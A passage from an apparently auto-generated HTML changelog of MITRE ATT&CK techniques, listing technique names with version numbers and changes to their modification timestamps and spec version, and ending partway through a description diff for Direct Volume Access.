18:38:49.538000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr></tbody></table></details><hr><h4>[T1559.001] Inter-Process Communication: Component Object Model</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:35.814000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.015] Obfuscated Files or Information: Compression</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:16:53.338000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1554] Compromise Host Software Binary</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 18:57:08.883000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:27.436000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1556.009] Modify Authentication Process: Conditional Access Policies</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.111000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1213.001] Data from Information Repositories: Confluence</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:59.776000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.643000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1218.002] System Binary Proxy Execution: Control Panel</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:37:43.971000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr></tbody></table></details><hr><h4>[T1578.002] Modify Cloud Compute Infrastructure: Create Cloud Instance</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.862000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1134.002] Access Token Manipulation: Create Process with Token</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:55:37.484000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.639000+00:00</td></tr></tbody></table></details><hr><h4>[T1578.001] Modify Cloud Compute Infrastructure: Create Snapshot</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.934000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1543] Create or Modify System Process</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:24.896000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1110.004] Brute Force: Credential Stuffing</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:14.923000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.708000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1552.001] Unsecured Credentials: Credentials In Files</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:03+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.672000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1555] Credentials from Password Stores</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:41.974000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1555.003] Credentials from Password Stores: Credentials from Web Browsers</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:49.577000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1552.002] Unsecured Credentials: Credentials in Registry</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:37.378000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1574.001] Hijack Execution Flow: DLL</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:57:22.515000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T1071.004] Application Layer Protocol: DNS</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:27.877000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.622000+00:00</td></tr></tbody></table></details><hr><h4>[T1568.003] Dynamic Resolution: DNS Calculation</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:03.093000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.673000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1485] Data Destruction</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:27.149000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1132] Data Encoding</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:23.915000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1486] Data Encrypted for Impact</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:16.589000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1565] Data Manipulation</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-20 15:10:23.526000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr></tbody></table></details><hr><h4>[T1001] Data Obfuscation</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:13.380000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1074] Data Staged</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:01.010000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.645000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1530] Data from Cloud Storage</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:37.187000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1005] Data from Local System</h4><p><b>Current version</b>: 1.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:40.839000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr></tbody></table></details><hr><h4>[T1213.006] Data from Information Repositories: Databases</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 23:54:04.429000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1102.001] Web Service: Dead Drop Resolver</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:37.828000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.725000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1622] Debugger Evasion</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:57:49.208000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1078.001] Valid Accounts: Default Accounts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:50:51.753000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.636000+00:00</td></tr></tbody></table></details><hr><h4>[T1678] Delay Execution</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:57:37.301000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1578.003] Modify Cloud Compute Infrastructure: Delete Cloud Instance</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.915000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr></tbody></table></details><hr><h4>[T1140] Deobfuscate/Decode Files or Information</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:58:25.069000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr></tbody></table></details><hr><h4>[T1610] Deploy Container</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:59:11.024000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.634000+00:00</td></tr></tbody></table></details><hr><h4>[T1006] Direct Volume Access</h4><p><b>Current version</b>: 3.0</p>
+    <table class="diff" id="difflib_chg_to0__top"
+           cellspacing="0" cellpadding="0" rules="groups" >
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <thead><tr><th class="diff_next"><br /></th><th colspan="2" class="diff_header">Old Description</th><th class="diff_next"><br /></th><th colspan="2" class="diff_header">New Description</th></tr></thead>
+        <tbody>
+            <tr><td class="diff_next" id="difflib_chg_to0__0"><a href="#difflib_chg_to0__top">t</a></td><td class="diff_header" id="from0_1">1</td><td nowrap="nowrap">Adversaries&nbsp;may&nbsp;directly&nbsp;access&nbsp;a&nbsp;volume&nbsp;to&nbsp;bypass&nbsp;file&nbsp;acce</td><td class="diff_next"><a href="#difflib_chg_to0__top">t</a></td><td class="diff_header" id="to0_1">1</td><td nowrap="nowrap">Adversaries&nbsp;may&nbsp;directly&nbsp;access&nbsp;a&nbsp;volume&nbsp;to&nbsp;bypass&nbsp;file&nbsp;acce</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ss&nbsp;controls&nbsp;and&nbsp;file&nbsp;system&nbsp;monitoring.&nbsp;Windows&nbsp;allows&nbsp;progr</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ss&nbsp;controls&nbsp;and&nbsp;file&nbsp;system&nbsp;monitoring.&nbsp;Windows&nbsp;allows&nbsp;progr</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ams&nbsp;to&nbsp;have&nbsp;direct&nbsp;access&nbsp;to&nbsp;logical&nbsp;volumes.&nbsp;Programs&nbsp;with&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ams&nbsp;to&nbsp;have&nbsp;direct&nbsp;access&nbsp;to&nbsp;logical&nbsp;volumes.&nbsp;Programs&nbsp;with&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">direct&nbsp;access&nbsp;may&nbsp;read&nbsp;and&nbsp;write&nbsp;files&nbsp;directly&nbsp;from&nbsp;the&nbsp;dri</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">direct&nbsp;access&nbsp;may&nbsp;read&nbsp;and&nbsp;write&nbsp;files&nbsp;directly&nbsp;from&nbsp;the&nbsp;dri</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ve&nbsp;by&nbsp;analyzing&nbsp;file&nbsp;system&nbsp;data&nbsp;structures.&nbsp;This&nbsp;technique&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ve&nbsp;by&nbsp;analyzing&nbsp;file&nbsp;system&nbsp;data&nbsp;structures.&nbsp;This&nbsp;technique&nbsp;</td></tr>
